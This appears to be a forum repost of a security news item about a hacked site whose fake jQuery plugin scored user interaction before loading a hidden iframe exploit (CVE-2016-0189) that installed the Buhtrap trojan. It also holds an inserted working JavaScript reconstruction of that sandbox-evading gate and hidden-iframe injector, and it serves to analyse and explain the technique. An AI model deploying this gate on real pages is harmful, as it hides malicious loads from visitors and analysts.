Security News: Sneaky JavaScript Waits for User Interaction Before Infecting Them with Malware

Exterminator

Malware gangs are always looking for new methods, or old tricks to refurbish, for their attacks. One of the latest methods they employ relies on using a user interaction score to decide whether to load their malicious content.

The technique was spotted by security firm Forcepoint on a boxing-related website in Russia and resulted in users getting infected with the Buhtrap banking trojan.

The culprit, in this case, is a JavaScript file that attackers added to the compromised website's source code. The file contained a copyright section that tried to fool users who inspected the file, making them believe that this was a copy of the jQuery Animate Plugin v1.2. In reality, the file's copyright section was different from, and separate from, the real plugin's.

Malicious code assigned different scores for user actions
After taking a closer look at this file, researchers said they found a grading system inside it. Crooks had assigned scores to actions like clicking (16 points), scrolling (11 points), or moving the mouse (1 point).

The plugin would wait for the page to load, and for user interaction. Based on what types of interactions occurred, if the total score surpassed 30, then it would load a hidden iframe on the same page.
This iframe contained exploit code that attempted to run various PowerShell commands that took advantage of the CVE-2016-0189 Internet Explorer vulnerability to install the banking trojan.

Obviously, since this was an Internet Explorer flaw, the malicious jQuery plugin triggered only for IE browsers, ignoring others.

Trick seen before in a small-time, now-defunct exploit kit
CVE-2016-0189 is a security flaw that was used in cyber-espionage attacks against South Korean organizations, and which Microsoft patched in May.

After a researcher foolishly published active exploitation proof-of-concept code on GitHub, the code was added to the Neutrino exploit kit in July.

This trick of loading hidden iframes on a page only after the user has interacted with the content was seen before, in 2014, used by a small-time exploit kit called Niteris, also known as CottonCastle. The grading system is somewhat novel.
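Added example, not the script Forcepoint analysed and not part of the original post: a reconstruction of the interaction-scoring gate described above, using the weights quoted in the post (click 16, scroll 11, mouse move 1, payload armed once the total exceeds 30). The scoring is kept in plain functions so an analyst can replay event sequences offline, which is the practical point of such a gate: a sandbox that never clicks or scrolls never sees the iframe. Assumptions not taken from the post: the browser check is done on the user-agent string (matching "MSIE" or "Trident"), the armed action is a callback, and the iframe target in `attach` is a hypothetical placeholder.

```javascript
// Reconstruction of an interaction-scoring gate (added example; the real script's
// source is not on the page). Weights and threshold are the figures quoted in the post.
const WEIGHTS = { click: 16, scroll: 11, mousemove: 1 };
const THRESHOLD = 30; // the payload arms once the running total exceeds this

// Assumption: the IE-only behaviour is keyed on the user-agent string.
// "MSIE" covers IE <= 10, "Trident/" covers IE 11.
function isTargetBrowser(userAgent) {
  return /MSIE |Trident\//.test(userAgent);
}

// Builds a gate that calls onArmed exactly once, the first time the score passes
// THRESHOLD. Events on non-target browsers are ignored, so the score stays at 0.
function createGate(userAgent, onArmed) {
  let score = 0;
  let armed = false;
  const eligible = isTargetBrowser(userAgent);
  return {
    record(type) {
      if (!eligible || armed) return score; // nothing to do after arming
      score += WEIGHTS[type] || 0;          // unknown event types score nothing
      if (score > THRESHOLD) {
        armed = true;
        onArmed(score);
      }
      return score;
    },
    score: () => score,
    armed: () => armed,
    eligible,
  };
}

// Replays a sequence of event names, as an analyst would when trying to coax the
// payload out of the page, and reports the final state of the gate.
function replay(events, userAgent) {
  let firedAt = null;
  const gate = createGate(userAgent, (s) => { firedAt = s; });
  events.forEach((e) => gate.record(e));
  return { score: gate.score(), armed: gate.armed(), firedAt };
}

// Fewest events of one kind needed to exceed the threshold (2 clicks, 3 scrolls, 31 moves).
function eventsNeeded(type) {
  return Math.floor(THRESHOLD / WEIGHTS[type]) + 1;
}

// Browser-side wiring: attach listeners and, once armed, inject a zero-size iframe.
// The default target is a placeholder, not anything from the post.
function attach(doc, win, target = "about:blank") {
  const gate = createGate(win.navigator.userAgent, () => {
    const frame = doc.createElement("iframe");
    frame.src = target;
    frame.style.cssText = "width:0;height:0;border:0;position:absolute;left:-9999px";
    doc.body.appendChild(frame);
  });
  ["click", "scroll", "mousemove"].forEach((t) =>
    doc.addEventListener(t, () => gate.record(t))
  );
  return gate;
}

// Only wire up the DOM when running inside a browser; in Node the functions above
// can be exercised directly.
if (typeof document !== "undefined" && typeof window !== "undefined") {
  attach(document, window);
}
```

For a sandbox, the useful numbers are the ones `eventsNeeded` and `replay` give: two synthetic clicks, or one click plus two scrolls, are enough to cross the threshold, and a non-IE user agent never arms the gate at all, so a detonation environment has to present both the right browser string and a plausible burst of interaction.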

 

DardiM

Thanks for the share :)
What is the benefit of this trick? I can't think of any.
Agreed, they are some very bored authors lol
Cool Share Exterminator :)

=> To be almost sure a real person is present on the webpage before eventually redirecting to the exploit/malware page, for example (a method against automated analysis systems, etc.).
 
